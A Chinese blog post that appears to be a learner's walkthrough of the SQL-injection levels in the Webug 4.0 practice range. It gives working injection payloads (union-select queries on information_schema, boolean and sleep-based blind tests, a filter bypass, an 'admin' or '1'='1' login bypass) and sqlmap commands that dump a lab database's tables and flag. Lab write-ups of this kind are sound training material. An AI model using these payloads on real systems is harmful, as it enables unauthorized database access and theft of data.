靶场练习-Webug4.0-注入

于 2023-08-08 21:09:52 发布
阅读量127 收藏
点赞数
分类专栏: 靶场练习-初级 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Bcat_ZC/article/details/132175632
版权

注入
1 显错注入 :随便加一个单引号后,会将整条语句报错输出【SELECT * FROM sqlinjection WHERE id = ‘1 ‘’】,然后构造了【0’ union select 2,1–+】payload回显了1,将1的位置替换成【(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())】看到一个flag表,然后根据【(select group_concat(column_name) from information_schema.columns where%20table_schema=‘库名’ and table_name=‘表名’)】和【select 列名 from 表名】从flag表的flag列得到flag。
2 布尔注入 :通过and 1=1和1=2看到不同的回显(or看到有多个hello),通过【length(database())>N】判断数据库名长度,再通过【ascII(substr(database(),x,1))=N】爆出库名,然后,然后不知道怎么弄表名只能上工具.;本来以为还在上一道题的表里,结果发现没有,于是在env_list表中看到flag。
sqlmap -u “http://192.168.3.133/control/sqlinject/bool_injection.php?id=1” --dbs;
sqlmap -u “http://192.168.3.133/control/sqlinject/bool_injection.php?id=1” -D webug --tables;
sqlmap -u “http://192.168.3.133/control/sqlinject/bool_injection.php?id=1” -D webug -Tenv_list --columns;

sqlmap -u “http://192.168.3.133/control/sqlinject/bool_injection.php?id=1” -D webug -Tenv_list -C “envFlag” --dump 。
3 延时注入 :使用【if(1=1,sleep(10),2)】可以看到存在注入点,然后同上一道题一样的做法。
4 post注入 :在搜索框输入搜索信息,抓包后单引号会报错,测试【0’ or if(1=1,sleep(1),2)】存在注入点,继续使用工具;将bp抓包保存1.txt,然后还是用sqlmap -r “1.txt” -p keyWordName --dbs;然后按照上题的步骤即可。
5 过滤注入:【‘||(if(length(database())>6,sleep(5),NULL))||’】这样可以,然后还是同上一题的方式。
6 宽字节注入:綅%27有报错,存在注入点,然后接着用工具吧。。。
7 xxe注入:暂时先过,做不出来。
8 csv注入:找不到问题点,没有输入也没有输出,查看源代码,数据库打开的密码不对,更改一下就有显示了。嗯,然后,然后,然后还是不会。。。
11 万能密码登陆:用户名直接admin’ or ‘1’='1就可以了。

Bcat_ZC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
webug4.0通关笔记----(第一天:显错注入
liver100day的博客
04-23 745
布尔注入 布尔盲注:根据注入信息返回true or fales 没有任何报错信息 非法的用户可根据返回的报错信息,获取到数据库的重要信息 开始注入 在本次注入中,我们会频繁的使用到下面命令: length(str):返回str字符串的长度。 substr(str, pos, len):str:要截取的字符串,pos:开始截取的位置,len:截取的长度 将str从pos位置开始截取len长度的字符进 行返回。注意这里的pos位置是从1开始 的,不是数组的0开始 mid(str,pos,l
Webug4.0显错注入
AmyBaby00的博客
01-23 239
进入页面,输入单引在id=1后面加单引号页面报错。 构造查询语句1’ or 1=1%23页面正常显示。 利用order by 语句判断字段数。由1开始输入,输入3时报错,因此判断字段个数是两个。 利用version()语句获得当前数据库版本5.5.53 查询数据库名称 查看webug数据库中的内容。 查看flag表中的内容。 查看flag列中的内容。 得到flag中数据。 ...
webug4.0—显错注入
Stephen Wolf
01-09 369
所用到一些知识: 1. concat(str1,str2,...) 返回结果为参数间无间隔符连接起来的字符串,如果其中有一个参数为NULL,返回结果为NULL 2. concat_ws(separator, str1, str2, ...) 含有分隔符地连接字符串,第一个参数为制定的分隔符 3. group_concat(str1,str2,...)  连接一个组的所有字符串,...
webug4.0-显错注入
nex1less的博客
08-25 1030
webug4.0-显错注入
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
Webug 4.0下载地址-附件资源
03-02
Webug 4.0下载地址-附件资源
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
渗透测试经典靶场学习-DVWA练习.
07-02
渗透测试经典靶场学习-DVWA练习.
漏洞靶站webug4.0
08-26
WeBug名称定义为“我们的漏洞”靶场环境 基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。 部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。
Webug4.0 sql显错注入
angry_program的博客
01-03 383
第一次实战SQL注入 作战类型 : 显错注入 目标 :拿下flag数据 目标长相 : 1. 判断注入类型 输入: and 1=1 => 正常, 再输入: and 1=2 => 还正常, 排除数字型 输入单引号: ' => 网页发生变化, 则为字符型 从报错信息可以看出是字符型, 故类型为显错注入 2. 判断字段...
Webug靶场之旅——显错注入
weixin_53953503的博客
08-18 758
显错注入 显错注入是SQL注入的一种,而SQL注入是指web应用程序对用户输入数据的合法性没有判断,导致攻击者可以构造不同的sql语句来实现对数据库的操作。 SQL注入漏洞产生的条件:  1、用户能够控制数据的输入。  2、原本执行需要执行的代码时,拼接了用户的输入。 打开webug靶场,打开id为1的靶场后,如图: 这里我们使用工具的是Hackbar2.1.3版本,这个是免费的。 首先,我们需要判断是否存在SQL注入。在参数后面多加一个单引号,然后将它上传,发现报错了 通过页面的返回结果,
webug————显错注入
weixin_55554070的博客
01-10 2628
1、打开靶场,寻找注入点进行测试 id=1 2、输入’;";),进行判断查看是否报错 输入”;)页面无变化,’出现报错,说明存在SQL注入 3、注入流程 :寻找注入点—>构造注入语句查看数据库版本与信息—>获取敏感数据或getshell。 判断数据库版本(MySQL数据库版本在5.0以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息);库——表——字段——数据 4、判断字段数 order by 5、3页面报错 2页面正常,说明.
Webug4.0靶场通关笔记(第一天)--------显错注入和布尔注入
Yasso的博客
02-20 1038
一、显错注入 打开靶场试试尝试修改为id=2,回显hello。 1、首先判断注入点 插播一条,php版本必须为5.3.29,不然不会报错!!!!!!!!!!!!!!!! 尝试加单引号,会报错, (%23不能在hackbar上输入,否则会一直报错,我们来测试下在hackbar上输的%23到url上变成了%2523,很明显这是#的二次url编码)还是不用hackbar了,也可能是我的hackbar有问题。 ?id=1’ 页面报错 ?id=1’ or 1=1%23 页面显示正常 (这里#貌似被过
Webug4.0 打靶笔记
m0_60716947的博客
05-11 4040
一、Webug 的安装 (1)基本信息 WeBug 名称定义为”我们的漏洞”靶场环境 ,基础环境是基于 PHP/mysql 制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。在 webug3.0 发布后的四百多天 226安全团队终于在大年初二发布了 webug 的 4.0 版本。 (2)虚拟机的安装 最新超详细VMware虚拟机下载与安装_隐
webug 4.0 第一关 显错注入
ONS_cukuyo的博客
02-28 7813
感谢webug团队一直以来的更新维护! webug是什么 WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。 Webug官网:http://www.web...
webug 4.0 第三关 延迟注入
ONS_cukuyo的博客
02-28 1869
感谢webug团队一直以来的更新维护! webug是什么 WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。 Webug官网:http://www.web...
webug 4.0 第一关 显错注入没有显错
03-24 1106
按照这位大佬的攻略去试了一下 发现没有显错 然后看了一下源码 因为本人是做 java 开发的,不太熟悉,调试就免了,但是乍看之下没问题,直接改代码观察一下: $res = die("Invalid query: ". mysqli_stmt_error(). $sql); " ' "被自动转义成"\'"了,所以怎么查都没问题。 ...
SQL注入靶场sqli-labs
最新发布
12-20
sqli-labs是一个基于SQL注入的游戏教程,它可以帮助用户更好地了解SQL注入的语法和原理。要搭建sqli-labs靶场,您可以按照以下步骤进行操作: 1. 下载sqli-labs项目:您可以从GitHub上的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值